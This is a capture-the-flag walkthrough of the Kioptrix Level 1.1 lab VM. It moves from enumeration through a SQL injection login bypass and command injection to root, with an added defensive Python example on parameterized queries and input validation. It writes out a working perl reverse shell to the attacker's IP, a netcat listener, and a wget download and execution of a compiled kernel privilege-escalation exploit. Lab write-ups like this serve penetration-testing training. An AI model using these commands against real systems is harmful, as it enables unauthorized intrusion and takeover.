Kioptrix: Level 1.1 (#2) Walkthrough
So, this is the 2nd machine of the Kioptrix series. Kioptrix is a beginner boot2root series. Let's get into it.
Link to the VM image:
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Download the image file and open the virtual image in VMware/VirtualBox.
Enumeration:
So let's find out the IP of the Kioptrix machine. For that we use the command:
netdiscover
Nmap Scan
nmap -sC -sV 192.168.0.105
Port 80:
We visit the webpage hosted on port 80:
http://192.168.0.105:80
Let's check out the page source code:
ctrl+u
In the meantime let's run Gobuster in the background in order to find hidden directories.
gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
As we have got a login page, let's try SQL injection:
And Boom!! We are in.
I assume that the back-end SQL statement was:
SELECT * FROM USERS WHERE username='' AND password=''
EXPLOITATION:
Now let's try command injection. Using the Wappalyzer extension we know that the page is PHP based, so:
And we got the command executed.
This means there is a possibility of RCE (Remote Code Execution) using a reverse shell. Let's check whether bash or python is installed on the victim machine:
;bash --version
We get the output. That means bash is installed on the machine, so we can get a bash reverse shell.
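To make the two weaknesses above concrete from the defender's side, here is an added example (not code from the original post or from the Kioptrix VM) that models the assumed login statement and the ping form: the string-concatenated query accepts a classic login-bypass input, the parameterized query does not, and a strict IPv4 check rejects the ";bash --version" style input. The in-memory database, the single user row and the password are constructed for the demo.

```python
import ipaddress
import sqlite3


def make_db():
    """Constructed demo database: one user row, plaintext password for illustration only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cretPass!')")
    return conn


def login_concatenated(conn, username, password):
    """The assumed vulnerable form: user input is pasted straight into the SQL text."""
    sql = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened form: placeholders keep the input as data, never as SQL syntax."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def validate_ping_target(value):
    """Hardened input check for the ping form: accept only a bare IPv4 literal.

    Returns the normalised address, or None for anything else (including a
    value with a trailing ';' command), so no shell metacharacter reaches ping.
    """
    try:
        return str(ipaddress.IPv4Address(value.strip()))
    except ValueError:
        return None


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1"
    print("concatenated, bypass input:", login_concatenated(db, bypass, bypass))  # True
    print("parameterized, bypass input:", login_parameterized(db, bypass, bypass))  # False
    print("ping target check:", validate_ping_target("192.168.0.104;bash --version"))  # None
```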
For some reason I was not able to get a bash reverse shell, so I tried perl.
;perl -v
We refer to Pentest Monkey for the reverse shell.
In our terminal we use netcat in listening mode so that we can receive the shell:
nc -nlvp 443
perl -e 'use Socket;$i="192.168.0.104";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
192.168.0.104: my Kali Linux machine IP
Hurray!! We got the shell.
POST EXPLOITATION:
So now let's escalate our privileges:
Check the kernel version number:
cat /proc/version
Search Google for a kernel exploit. We found the exploit:
https://www.exploit-db.com/exploits/9542
So let's copy the exploit:
gedit exploit.c
Copy and paste the code into the file.
This exploit is an old exploit, hence it throws an error when we compile it with the gcc compiler. And the flag -m32 was working in my case, so we choose clang, which comes pre-installed in Kali Linux.
clang -o exploit -m32 exploit.c
Now let's place this exploit in our Apache server directory:
mv exploit /var/www/html
Let's start our Apache server:
service apache2 start
Now let's go back to our reverse shell and change to the /tmp directory, as this directory has all the permissions (read, write, execute):
wget 192.168.0.104/exploit
ls
chmod 755 exploit
Now run the exploit.
./exploit
And we are root.
So this was the second machine of the Kioptrix series. Stay tuned for the other machines of this series.